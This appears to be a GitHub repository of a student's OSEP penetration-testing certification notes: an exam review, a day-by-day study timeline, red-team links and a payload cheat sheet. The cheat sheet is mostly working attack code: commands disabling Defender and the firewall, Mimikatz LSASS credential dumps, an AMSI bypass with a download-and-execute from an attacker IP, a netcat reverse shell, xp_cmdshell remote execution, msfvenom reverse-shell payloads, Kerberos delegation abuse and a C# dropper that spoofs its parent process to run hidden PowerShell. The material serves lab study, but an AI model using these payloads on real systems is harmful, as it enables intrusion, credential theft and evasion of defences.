├── .gitignore ├── Exam 2.0.md ├── README.md ├── Timeline.md ├── Useful Resources ├── Links.md ├── Payloads.md └── Tools.md └── images └── Default.png /.gitignore: -------------------------------------------------------------------------------- 1 | .obsidian -------------------------------------------------------------------------------- /Exam 2.0.md: -------------------------------------------------------------------------------- 1 | # D Day - 02 2 | --- 3 | ## Offsec were kind enough to let me retake my exam without cooldown period of 1 month (Will not disclose the reason.) I am thankful to Offsec for letting me retake quickly. 4 | 5 | --- 6 | ## Prep after first fail. 7 | - Only one prep, went through google to learn more about the path I got stuck, got some lead, time to test in exam. It worked. 8 | - Really nothing else, no labs, no extension, no blogs. 9 | --- 10 | ## The Exam 11 | - Exam was a breeze, got the minimum required flags well under time, had lots of time to go through various methods and test my hypothesis. 12 | - Did I get secret.txt? 13 | - unfortunately Nooooooooo. 14 | - How close was I ? 15 | - I guess just one hop away, Not 100% sure as I could see the box. 16 | - I had more flags than the 10 required. 17 | - Will I give the exam again to get to secret.txt 18 | - Yes, Someone pay for my retest XD. 19 | - Was the Exam environment stable? 20 | - Yes 21 | - But, after a reset I don't know why, the initial payload dint work, had to reset to exploit again, works like a charm. This happened only once. 22 | - Had to trigger the payload multiple times, maybe it is the design. 23 | - Nothing is broken. Yes nothing is broken, I initially thought the same, but later figured out it was not broken. Like OSCP, You have to tweak your payloads a lil to get execution. 24 | --- 25 | Offsec Clearly states in its FAQ: 26 | ``` 27 | The exam consists of one large network with multiple machines that must be compromised. As the exam network simulates a corporate network, you will have to first obtain a foothold and then perform additional internal attacks. There are multiple attack paths through the network that will result in the same level of compromise. 28 | 29 | Some of the machines will require multiple exploitation steps, resulting first in low-level local access, and then in root or administrative privilege escalation. Other machines will be fully exploitable remotely. 30 | 31 | While we cover a number of more advanced techniques in this course, foundational attack components are also part of the exam. 32 | 33 | Specific instructions for your target network will be located in your Exam Control Panel, which will only become available to you once your exam begins. 34 | ``` 35 | 36 | With the above FAQ's one Shouldn't really struggle with the exam, although I made some silly mistakes (We all do at some stages, nothing to be ashamed off). 37 | - Yes there is more than one way to compromise/ get foothold. 38 | - `While we cover a number of more advanced techniques in this course, foundational attack components are also part of the exam.` 39 | - I want to stress on this line more because I saw people complain about certain vectors. 40 | - Do not forget your fundamentals, you learnt this in OSCP. Use the same tricks. 41 | - Do not call this as out of syllabus. It is nothing difficult, you would have done the same tricks in OSCP labs and exam. Use the same skillset here. 42 | - Google whatever you don't understand. I believe you should know how to google lil pieces of information available to you => Follow the path => connect the dots => You have what you need. Go get that shell. 43 | - You don't need to compromise every machine to pass, Just go with the flow of where the exploitation and enumeration leads you. 44 | --- 45 | ## My review of Exam 46 | - The foothold was similar to lab, nothing new. 47 | - Pivot also similar to labs. 48 | - Does the lab and pdf cover what is required for the exam? 49 | - Yes and no. 50 | - No: Like OSCP no exact copy paste of the techniques. I felt the labs could have been a little more complex w.r.t the payloads crafted in the exam. 51 | - Don't be discouraged with the above point. You will be able to figure out the solutions when your stuck, just take a break and start from scratch with the details you have. 52 | - Do you need other labs and courses ? 53 | - No, I had zero experience w.r.t AD and Defender evasion. 54 | - W.R.T learning, please do refer other resources as some techniques are better explained and simple to use when compared with the PDF and videos. 55 | - It is an advantage as you will learn new topics and methods which you can implement in the exam. 56 | - Keep backup payloads. I recommend to keep at least one good payload to get a RCE even if you don't get a shell. 57 | - Take breaks, It is doable, Don't lose focus. 58 | --- 59 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # My journey and story so far 2 | --- 3 | # Intro: 4 | --- 5 | I am a Masters Student in information Security, with keen interest in infrastructure security. Worked as an intern, Volunteer and Freelancer for a couple of companies. Participated in CTF's, solved boxes in HTB, TryHackMe, Proving Grounds, etc. I would design home labs to test and practice, but never worked with Active Directory prior to OSEP. I got my OSCP in February 2021, did not work anywhere or practiced as I was focusing on my masters application and preparing to move out. I jumped directly in OSEP in November and as time goes by, I am here Writing my post OSEP experience. Everybody has their own path and experience 6 | 7 | Here is mine......... 8 | 9 | --- 10 | ## The Main part 11 | 1. [Timeline](Timeline.md) 12 | 2. [Links](/Useful%20Resources/Links.md) 13 | 3. [Tools](/Useful%20Resources/Tools.md) 14 | 4. [Payloads](/Useful%20Resources/Payloads.md) 15 | 5. [Exam 2.0](Exam%202.0.md) 16 | -------------------------------------------------------------------------------- /Timeline.md: -------------------------------------------------------------------------------- 1 | # Timeline 2 | --- 3 | ## TL;DR: Contains the timeline and flow of my preparation, not in detail with payload and methods 4 | Every Payload and Methods will be updated When I pass my `EXAM` 5 | --- 6 | ## Day 1: 7 | --- 8 | Got the access on November 4th,2021 => Download all files => Start reading from start. 9 | 10 | Looking at Topics, I could feel the major upgrade from OSCP to OSEP. I was impressed with the course content. 11 | Decided to study PDF first => videos => lab. 12 | spent the day by glancing at the topics and trying to rate my knowledge in the topic. 13 | Decided to spend two days, one each for the PDF and videos 14 | 15 | --- 16 | 17 | ## Day 2 to Day 4: 18 | --- 19 | Theory of Client Side Code Execution with Office. 20 | I was familiar with using VBA, but the course did have some very in depth content which I found really interesting. Understood key point is to keep it in memory and preferred to use staged payload, as the dropper size can be reduced and detection rate is low. Some of the topic was mainly about code execution post dropper mode, but it did not deal with AV/Defender bypass as yet. Simple Topic shouldn't take much time if you know about macros already. 21 | 22 | --- 23 | 24 | ## Day 5 to Day 7 25 | --- 26 | ### Theory of Client Side Code Execution With Windows Script Host 27 | The flow was similar to that of the macros, 28 | Dropper => Staged Payload => In Memory execution using powershell, c# payload. 29 | Introduction to DotNetToJscript and SharpShooter, although most AV detect the payload now, u can still play around it. 30 | .js file is by default executed by windows, so we don't have to worry about explicitly calling it through an app. 31 | ![](/images/Default.png?raw=true) 32 | 33 | --- 34 | 35 | ## Day 8 to Day 9 36 | --- 37 | ### Process Injection and Migration. 38 | Been used to meterpreter doing the steps that we take it for granted. 39 | I really enjoyed reading this part as there was step by step description in theory and video, and I appreciate OFFSEC for explaining the basic steps so neatly. 40 | Worth the time spent here. Has C# and Powershell payloads described in here, 41 | 42 | --- 43 | 44 | ## Day 10 to Day 14 45 | --- 46 | ### AV evasion 47 | As the Topic says, AV evasion. 48 | This topic is where you have to focus a lot, as the labs have defender and AV over it. Specially AMSI bypass as your gonna need it almost every time you try to get a code exec. Couple of straight methods described in PDF, Your free to use yours (I recommend to keep backup scripts). Since the course has been out, Students have been successful in submitting samples to the AV vendors, which leads to detection of our payload, To not worry/panic during lab/exam please prepare your own script, even a slight modification in Dropper code is sometimes enough to bypass some AV, so obfuscation is really important. It shows the payload generation for Macros, C#, and Powershell. So this is one of the important topic. 49 | 50 | On Day 11, I start my Lab 1: Took a couple of days to actually understand, as I was stuck on it with the OSCP mindset to get a foothold => user shell => priv shell. But that is not the aim in here. Our target is DC, so focus more on pivot and AD. To try and test your code, you are provided with a test Win 10 VM, but i would recommend having your own VM for testing. **NOTE** 51 | `Please Disable Windows Defender and any other AV if you have installed in your Host while testing . If your using a shared directory on you host windows, Please make sure you add the shared directory on whitelist or ignore list and disable sample submission in your Defender. I would recommend disable NAT/Bridged mode network to test VM, preventing it from accessing the internet.` 52 | I had to refer to Application Whitelisting as we are gonna use AMSI bypass together with CLM bypass, so get a good payload ready for your exam. 53 | 54 | --- 55 | ## Day 15 and Day 16 56 | --- 57 | Still stuck on lab 1. Trying to understand pivot paths, Basic Active Directory introduction in here. There will be occasional jumps between topics like AV bypass, AD, Process injection, etc. So it was good run between multiple topics. The focus in here is about trying to reach DC as soon as possible. Check if you can priv esc quickly, else find path, creds or any info from AD enum to pivot into next IP. 58 | **Focus on Movement** 59 | PowerView, BloodHound and Metasploit are your best friends in the lab. Get a hang of them. 60 | Lab 2 was a breeze, PDF is more than enough for you guys, couple of hours your done. 61 | Lab 3 was interesting. its like, every lab covers a part of PDF, so not trying the individual modules in practice will definitely consume more time while solving the labs, but you are free to experiment yourself. 62 | 63 | --- 64 | ### NEED A BREAK FOR COUPLE OF DAYS, TOO HECTIC SCHEDULE FROM THE START OF LABS 65 | I am a University student, Juggling between classes and OSEP and other stuff 66 | 67 | --- 68 | Day 19 69 | --- 70 | I shift my focus onto labs only for now, Will refer the PDF and notes when required. 71 | Lab 4 sets the path towards the exam. 3 days to get all flags, now I realize my AD needs some serious work. 72 | 73 | 74 | --- 75 | ## Day 23 76 | Lab 5 was weird w.r.t starting the lab, I had to revert the labs thrice to get the machine to spawn. i'm on day 26 just a couple more box left. This was some real pivoting and AD, and i guess i have the expectation of what LAB 6 beholds, which OFFSEC says is as close as it gets to the exam. I would like to solve it without any nudges. 77 | 78 | --- 79 | 80 | ## Day 26 81 | --- 82 | Done with lab 5, Kind of tricky, but AD is really important. 83 | 84 | --- 85 | 86 | ## Day 27 87 | --- 88 | Starting Lab 6 , took a week to understand lot of stuff, some things were new, some assumptions, some classic misconfig. 89 | As much as I wanted to solve without hints, I had to rely on some pointers to figure it out. Kinda sad, but worth it as I learned some new tricks and accessed some good repos which were really useful w.r.t exam. 90 | 91 | --- 92 | 93 | ## Day 34 94 | --- 95 | All labs done, Took quite a long break for 10 days. 96 | 97 | --- 98 | 99 | ## Day 45 100 | --- 101 | Refreshing through all labs, rechecking all payloads and stuff. 102 | Found some really nice code for dropper, and finally managed 0 detections in static analysis 103 | I feel confident enough to schedule exam on Jan 2nd. 104 | 105 | --- 106 | 107 | ## Day 53 to Exam Day 108 | --- 109 | What happens when you are way too optimistc. End up with Covid right after boxing day. 110 | A sane person would have rescheduled his exam, but not me, was way too optimistic and eager to finish the exam, and dint reschedule. 111 | Biggest mistake, 112 | ``` 113 | Never take any exam/task right after recovery or you feel recovered after illness. The Medications make you drowsy and hampers your thinking ability 114 | ``` 115 | 116 | --- 117 | 118 | # Exam Day 119 | --- 120 | Nothing works according to plan. 121 | - Payload fails. 122 | - Initial Enum is $#!&. 123 | - Medicines making drowsy. 124 | - My brain is not working. 125 | 126 | 24 hours in and only one flag, made me question my skills. A simple priv esc dint work and the panic steps in. 127 | 128 | Mistakes: 129 | - No breaks. 130 | - Dint Focus on having my food at right time. 131 | - Panicked. 132 | - Lack of sleep. 133 | 134 | Decided to take a long break. Slept and started again. 135 | Got 4 more flags pretty quickly. High on confidence now until I hit a roadblock and lost my mind again. Finally with some sense in my head decided to quit the exam and focus on my mental health and physical health. 136 | A good Decision as I needed couple more days to recover completely. 137 | 138 | --- 139 | ``` 140 | I failed the exam, Not at all happy, and a poor start to the year, very depressed. 141 | ``` 142 | 143 | Positives From the Experience: 144 | - I can work under stress, not the optimal result but I can withstand pressure and perform tasks. 145 | - Understood importance of good health and breaks (Should have known about breaks from OSCP exam; -_- ). 146 | - Can think and analyze out of box and restart the task from basics to succeed. 147 | 148 | --- 149 | 150 | 151 | 152 | -------------------------------------------------------------------------------- /Useful Resources/Links.md: -------------------------------------------------------------------------------- 1 | # Quick Links to Refer 2 | ## Below are some of the links that have done the work so far in my labs, will be updating this as I progress 3 | --- 4 | 5 | 1. [Quick Payloads](https://github.com/chvancooten/OSEP-Code-Snippets) 6 | 2. [Study Links](https://github.com/nullg0re/Experienced-Pentester-OSEP) 7 | 3. [AMSI Obfuscator](https://amsi.fail/) 8 | 4. [Red Team Scripts](https://github.com/BankSecurity/Red_Team) 9 | 5. [Red Team Scripts 2](https://github.com/an4kein/awesome-red-teaming) 10 | 6. [LOLBAS](https://lolbas-project.github.io/) 11 | 7. [LOLBAS like AD suggestor](https://wadcoms.github.io/) 12 | 8. [Red Team Experiments](https://www.ired.team/) 13 | 9. [TurtleToolKit](https://github.com/latortuga71/TortugaToolKit) 14 | 10. [Hacktricks](https://book.hacktricks.xyz/) 15 | 11. [Windows Priv Esc](https://guif.re/windowseop) 16 | 12. [Mimikatz Cheat Sheet](https://adsecurity.org/?page_id=1821) 17 | 13. [AD Quick Reference](https://www.thehacker.recipes/) 18 | 14. [Infosec Reference](https://rmusser.net/docs/index.html#/) 19 | 15. [AD Cheat Sheet](https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/) `I like this personally` 20 | 16. [AMSI Bypass](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) 21 | 17. [AMSI Bypass Manual Method](https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/) 22 | 18. [S3cur3Th1sSh1t Github ](https://github.com/S3cur3Th1sSh1t) 23 | 19. [Octoberfest7 Github ](https://github.com/Octoberfest7) 24 | 25 | -------------------------------------------------------------------------------- /Useful Resources/Payloads.md: -------------------------------------------------------------------------------- 1 | # Quick commands to work with 2 | ### Will update as I refine and play around with it, Do explore other commands, some maybe faster and easier than the ones below 3 | ### By no way this is a silver bullet, Lot of payloads have not been added, these are just a few, please refer the links and explore more. Do not copy-paste you will not learn anything. 4 | --- 5 | ### Disable Defender and firewall 6 | ``` 7 | Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true 8 | NetSh Advfirewall set allprofiles state off 9 | ``` 10 | --- 11 | ### Mimikatz 12 | ``` 13 | mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit" 14 | --- 15 | mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "lsadump::secrets" "exit" 16 | --- 17 | mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "lsadump::sam /patch" "exit" 18 | --- 19 | mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "lsadump::lsa /patch" "exit" 20 | --- 21 | mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "lsadump::lsa /inject /name:kerberos" "exit" 22 | --- 23 | mimikatz.exe "kerberos::golden /user:Administrator /domain:final.com /sid: /krbtgt: /sids: /ptt" "exit" 24 | 25 | --- 26 | ``` 27 | --- 28 | ### Rubeus 29 | ``` 30 | NT hash for given password (Required for S4U) 31 | Rubeus.exe hash /password:Summer2018! 32 | 33 | S4U 34 | Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:administrator /msdsspn:cifs/ /ptt 35 | 36 | ``` 37 | --- 38 | ### Powershell 39 | --- 40 | #### AMSI bypass and Code Exec 41 | ``` 42 | $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1); 43 | 44 | (New-Object System.Net.WebClient).DownloadString('http://192.168.x.x/*.ps1')| IEX; 45 | ``` 46 | --- 47 | #### Remoting 48 | ``` 49 | Invoke-command -computername -scriptblock { c:\windows\tasks\nc.exe 192.168.x.x 443 -e cmd.exe} 50 | ``` 51 | --- 52 | #### RBCD 53 | ``` 54 | 55 | New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force) 56 | $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid 57 | $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" 58 | $SDBytes = New-Object byte[] ($SD.BinaryLength) 59 | $SD.GetBinaryForm($SDBytes, 0) 60 | 61 | Get-DomainComputer -Identity | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} 62 | 63 | .\Rubeus.exe hash /password:Summer2018! 64 | 65 | .\Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:administrator /msdsspn:cifs/ /ptt 66 | ``` 67 | --- 68 | #### SharpHound 69 | ``` 70 | (New-Object System.Net.WebClient).DownloadString('http://192.168.x.x/SharpHound.ps1') | IEX; Invoke-BloodHound -CollectionMethod All -domain 71 | 72 | ``` 73 | --- 74 | --- 75 | ### SQL 76 | ``` 77 | mssqlclient.py @ -hashes : -windows-auth 78 | mssqlclient.py :@ -windows-auth 79 | --- 80 | EXECUTE as LOGIN = 'sa';EXEC sp_serveroption '', 'rpc out', 'true';EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT ;EXEC('xp_cmdshell ''whoami'';') AT 81 | --- 82 | EXEC('xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://192.168.x.x/test.txt)'' ') AT ; 83 | --- 84 | proxychains ntlmrelayx.py --no-http-server -smb2support -t 85 | --- 86 | EXECUTE ('master.sys.xp_dirtree "\\\a"') 87 | 88 | exec ('execute as login =''user'';EXEC (''sp_configure ''''show advanced options'''', 1; RECONFIGURE; EXEC sp_configure ''''xp_cmdshell'''', 1; RECONFIGURE;'') AT server1') AT server2 89 | 90 | exec ('execute as login =''user'';EXEC (''xp_cmdshell ''''whoami'''' '') AT server1') AT server2 91 | ``` 92 | --- 93 | ### PSexec 94 | --- 95 | #### With hash / password 96 | ``` 97 | psexec.py -no-pass -hashes /@ 98 | psexec.py /:@ 99 | ``` 100 | --- 101 | #### Importing ticket and gaining shell 102 | ``` 103 | getST.py -spn CIFS/ -impersonate '' -ts /attackersystem\$:'' -dc-ip 104 | OR 105 | ticketer.py -domain-sid -nthash -domain -spn cifs/ 106 | 107 | export KRB5CCNAME=/tmp/administrator.ccache 108 | psexec.py user@IP -k -no-pass 109 | 110 | Note: 111 | If facing issues with tickets, try editing the spn 112 | example: -spn CIFS/box1.domain.local as -spn CIFS/box1 113 | ``` 114 | --- 115 | ### Evil-WinRM 116 | ``` 117 | evil-winrm -u \\ -H -i 118 | ``` 119 | --- 120 | ### Impacket 121 | --- 122 | ``` 123 | secretsdump.py /:@ 124 | ticketConverter.py win_format lin_format 125 | ``` 126 | --- 127 | ### MSF 128 | ``` 129 | sudo msfconsole -qx "use exploit/multi/handler ;set payload windows/meterpreter/reverse_tcp; set lhost tun0; set lport 4444;exploit;" 130 | sudo msfconsole -qx "use exploit/multi/handler ;set payload linux/x86/meterpreter/reverse_tcp; set lhost tun0; set lport 4444;exploit;" 131 | autorun 132 | set autoroute 'route 172.16.x.0/24'; 133 | msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.x.x lport=4444 -f exe -o 4444.exe 134 | msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.x.x lport=4444 -f elf -o lin-4444 135 | ``` 136 | --- 137 | ### CrackmapExec 138 | ``` 139 | proxychains crackmapexec smb -u \ -H 140 | proxychains crackmapexec smb -u -p 141 | ``` 142 | 143 | --- 144 | ## C# payload 145 | ``` 146 | Original paylods copied from 147 | https://github.com/leoloobeek/csharp/blob/master/ExecutionTesting.cs 148 | https://0x1.gitlab.io/pentesting/Defcon27-Csharp-Workshop/ 149 | ``` 150 | ``` 151 | using System; 152 | using System.Text; 153 | using System.Runtime.InteropServices; 154 | using Microsoft.Win32.SafeHandles; 155 | using System.IO; 156 | using System.Diagnostics; 157 | using System.Threading; 158 | 159 | 160 | 161 | namespace Dropper 162 | { 163 | class Program 164 | { 165 | 166 | static void Main(string[] args) 167 | { 168 | 169 | string command; 170 | int newParentProcId; 171 | 172 | Process[] expProc = Process.GetProcessesByName("notepad"); 173 | if (expProc.Length == 0) 174 | { 175 | Process.Start("notepad.exe"); 176 | Thread.Sleep(2000); 177 | expProc = Process.GetProcessesByName("notepad"); 178 | } 179 | newParentProcId = expProc[0].Id; 180 | 181 | // Modify the below to execute something else,) 182 | if (args.Length != 1) 183 | { 184 | command = "powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('')) | iex"; 185 | UnmanagedExecute.CreateProcess(newParentProcId, command); 186 | System.Environment.Exit(1); 187 | return ; 188 | } 189 | 190 | command = "powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('"+args[0]+"')) | iex"; 191 | Console.WriteLine("executing"); 192 | UnmanagedExecute.CreateProcess(newParentProcId, command); 193 | 194 | } 195 | } 196 | 197 | class UnmanagedExecute 198 | { 199 | [DllImport("kernel32.dll")] 200 | [return: MarshalAs(UnmanagedType.Bool)] 201 | static extern bool CreateProcess( 202 | string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, 203 | ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, 204 | IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo, 205 | out PROCESS_INFORMATION lpProcessInformation); 206 | 207 | [DllImport("kernel32.dll", SetLastError = true)] 208 | public static extern IntPtr OpenProcess(ProcessAccessFlags processAccess, bool bInheritHandle, int processId); 209 | 210 | [DllImport("kernel32.dll", SetLastError = true)] 211 | public static extern UInt32 WaitForSingleObject(IntPtr handle, UInt32 milliseconds); 212 | 213 | [DllImport("kernel32.dll", SetLastError = true)] 214 | [return: MarshalAs(UnmanagedType.Bool)] 215 | private static extern bool UpdateProcThreadAttribute( 216 | IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, 217 | IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize); 218 | 219 | [DllImport("kernel32.dll", SetLastError = true)] 220 | [return: MarshalAs(UnmanagedType.Bool)] 221 | private static extern bool InitializeProcThreadAttributeList( 222 | IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize); 223 | 224 | [DllImport("kernel32.dll", SetLastError = true)] 225 | [return: MarshalAs(UnmanagedType.Bool)] 226 | private static extern bool DeleteProcThreadAttributeList(IntPtr lpAttributeList); 227 | 228 | [DllImport("kernel32.dll", SetLastError = true)] 229 | static extern bool SetHandleInformation(IntPtr hObject, HANDLE_FLAGS dwMask, 230 | HANDLE_FLAGS dwFlags); 231 | 232 | [DllImport("kernel32.dll", SetLastError = true)] 233 | static extern bool PeekNamedPipe(IntPtr handle, 234 | IntPtr buffer, IntPtr nBufferSize, IntPtr bytesRead, 235 | ref uint bytesAvail, IntPtr BytesLeftThisMessage); 236 | 237 | [DllImport("kernel32.dll", SetLastError = true)] 238 | static extern bool CloseHandle(IntPtr hObject); 239 | 240 | [DllImport("kernel32.dll", SetLastError = true)] 241 | [return: MarshalAs(UnmanagedType.Bool)] 242 | static extern bool DuplicateHandle(IntPtr hSourceProcessHandle, 243 | IntPtr hSourceHandle, IntPtr hTargetProcessHandle, ref IntPtr lpTargetHandle, 244 | uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, uint dwOptions); 245 | 246 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] 247 | public static extern int GetConsoleOutputCP(); 248 | 249 | [DllImport("kernel32.dll")] 250 | static extern bool CreatePipe(out IntPtr hReadPipe, out IntPtr hWritePipe, 251 | ref SECURITY_ATTRIBUTES lpPipeAttributes, uint nSize); 252 | 253 | public static bool CreateProcess(int parentProcessId, string command) 254 | { 255 | // STARTUPINFOEX members 256 | const int PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000; 257 | const int PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = 0x00020007; 258 | 259 | // Block non-Microsoft signed DLL's 260 | const long PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON = 0x100000000000; 261 | 262 | // STARTUPINFO members (dwFlags and wShowWindow) 263 | const int STARTF_USESTDHANDLES = 0x00000100; 264 | const int STARTF_USESHOWWINDOW = 0x00000001; 265 | const short SW_HIDE = 0x0000; 266 | 267 | // dwCreationFlags 268 | const uint EXTENDED_STARTUPINFO_PRESENT = 0x00080000; 269 | const uint CREATE_NO_WINDOW = 0x08000000; 270 | 271 | // WaitForSingleObject INFINITE 272 | const UInt32 INFINITE = 0xFFFFFFFF; 273 | var error = Marshal.GetLastWin32Error(); 274 | 275 | // DuplicateHandle 276 | const uint DUPLICATE_CLOSE_SOURCE = 0x00000001; 277 | const uint DUPLICATE_SAME_ACCESS = 0x00000002; 278 | 279 | // https://msdn.microsoft.com/en-us/library/ms682499(VS.85).aspx 280 | // Handle stuff 281 | var saHandles = new SECURITY_ATTRIBUTES(); 282 | saHandles.nLength = Marshal.SizeOf(saHandles); 283 | saHandles.bInheritHandle = true; 284 | saHandles.lpSecurityDescriptor = IntPtr.Zero; 285 | 286 | IntPtr hStdOutRead; 287 | IntPtr hStdOutWrite; 288 | // Duplicate handle created just in case 289 | IntPtr hDupStdOutWrite = IntPtr.Zero; 290 | 291 | // Create the pipe and make sure read is not inheritable 292 | CreatePipe(out hStdOutRead, out hStdOutWrite, ref saHandles, 0); 293 | SetHandleInformation(hStdOutRead, HANDLE_FLAGS.INHERIT, 0); 294 | 295 | var pInfo = new PROCESS_INFORMATION(); 296 | var siEx = new STARTUPINFOEX(); 297 | 298 | // Be sure to set the cb member of the STARTUPINFO structure to sizeof(STARTUPINFOEX). 299 | siEx.StartupInfo.cb = Marshal.SizeOf(siEx); 300 | IntPtr lpValueProc = IntPtr.Zero; 301 | IntPtr hSourceProcessHandle = IntPtr.Zero; 302 | 303 | // Values will be overwritten if parentProcessId > 0 304 | siEx.StartupInfo.hStdError = hStdOutWrite; 305 | siEx.StartupInfo.hStdOutput = hStdOutWrite; 306 | 307 | try 308 | { 309 | if (parentProcessId > 0) 310 | { 311 | var lpSize = IntPtr.Zero; 312 | var success = InitializeProcThreadAttributeList(IntPtr.Zero, 2, 0, ref lpSize); 313 | if (success || lpSize == IntPtr.Zero) 314 | { 315 | return false; 316 | } 317 | 318 | siEx.lpAttributeList = Marshal.AllocHGlobal(lpSize); 319 | success = InitializeProcThreadAttributeList(siEx.lpAttributeList, 2, 0, ref lpSize); 320 | if (!success) 321 | { 322 | return false; 323 | } 324 | 325 | IntPtr lpMitigationPolicy = Marshal.AllocHGlobal(IntPtr.Size); 326 | Marshal.WriteInt64(lpMitigationPolicy, PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON); 327 | 328 | // Add Microsoft-only DLL protection 329 | success = UpdateProcThreadAttribute( 330 | siEx.lpAttributeList, 331 | 0, 332 | (IntPtr)PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, 333 | lpMitigationPolicy, 334 | (IntPtr)IntPtr.Size, 335 | IntPtr.Zero, 336 | IntPtr.Zero); 337 | if (!success) 338 | { 339 | Console.WriteLine("[!] Failed to set process mitigation policy"); 340 | return false; 341 | } 342 | 343 | IntPtr parentHandle = OpenProcess(ProcessAccessFlags.CreateProcess | ProcessAccessFlags.DuplicateHandle, false, parentProcessId); 344 | // This value should persist until the attribute list is destroyed using the DeleteProcThreadAttributeList function 345 | lpValueProc = Marshal.AllocHGlobal(IntPtr.Size); 346 | Marshal.WriteIntPtr(lpValueProc, parentHandle); 347 | 348 | success = UpdateProcThreadAttribute( 349 | siEx.lpAttributeList, 350 | 0, 351 | (IntPtr)PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, 352 | lpValueProc, 353 | (IntPtr)IntPtr.Size, 354 | IntPtr.Zero, 355 | IntPtr.Zero); 356 | if (!success) 357 | { 358 | return false; 359 | } 360 | 361 | IntPtr hCurrent = System.Diagnostics.Process.GetCurrentProcess().Handle; 362 | IntPtr hNewParent = OpenProcess(ProcessAccessFlags.DuplicateHandle, true, parentProcessId); 363 | 364 | success = DuplicateHandle(hCurrent, hStdOutWrite, hNewParent, ref hDupStdOutWrite, 0, true, DUPLICATE_CLOSE_SOURCE | DUPLICATE_SAME_ACCESS); 365 | if (!success) 366 | { 367 | error = Marshal.GetLastWin32Error(); 368 | return false; 369 | } 370 | 371 | error = Marshal.GetLastWin32Error(); 372 | siEx.StartupInfo.hStdError = hDupStdOutWrite; 373 | siEx.StartupInfo.hStdOutput = hDupStdOutWrite; 374 | } 375 | 376 | siEx.StartupInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; 377 | siEx.StartupInfo.wShowWindow = SW_HIDE; 378 | 379 | var ps = new SECURITY_ATTRIBUTES(); 380 | var ts = new SECURITY_ATTRIBUTES(); 381 | ps.nLength = Marshal.SizeOf(ps); 382 | ts.nLength = Marshal.SizeOf(ts); 383 | bool ret = CreateProcess(null, command, ref ps, ref ts, true, EXTENDED_STARTUPINFO_PRESENT | CREATE_NO_WINDOW, IntPtr.Zero, null, ref siEx, out pInfo); 384 | if (!ret) 385 | { 386 | Console.WriteLine("[!] Proccess failed to execute!"); 387 | return false; 388 | } 389 | SafeFileHandle safeHandle = new SafeFileHandle(hStdOutRead, false); 390 | var encoding = Encoding.GetEncoding(GetConsoleOutputCP()); 391 | var reader = new StreamReader(new FileStream(safeHandle, FileAccess.Read, 4096, false), encoding, true); 392 | string result = ""; 393 | bool exit = false; 394 | try 395 | { 396 | do 397 | { 398 | if (WaitForSingleObject(pInfo.hProcess, 100) == 0) 399 | { 400 | exit = true; 401 | } 402 | 403 | char[] buf = null; 404 | int bytesRead; 405 | 406 | uint bytesToRead = 0; 407 | 408 | bool peekRet = PeekNamedPipe(hStdOutRead, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref bytesToRead, IntPtr.Zero); 409 | 410 | if (peekRet == true && bytesToRead == 0) 411 | { 412 | if (exit == true) 413 | { 414 | Console.WriteLine("Command executed."); 415 | break; 416 | } 417 | else 418 | { 419 | continue; 420 | } 421 | } 422 | 423 | if (bytesToRead > 4096) 424 | bytesToRead = 4096; 425 | 426 | buf = new char[bytesToRead]; 427 | bytesRead = reader.Read(buf, 0, buf.Length); 428 | if (bytesRead > 0) 429 | { 430 | result += new 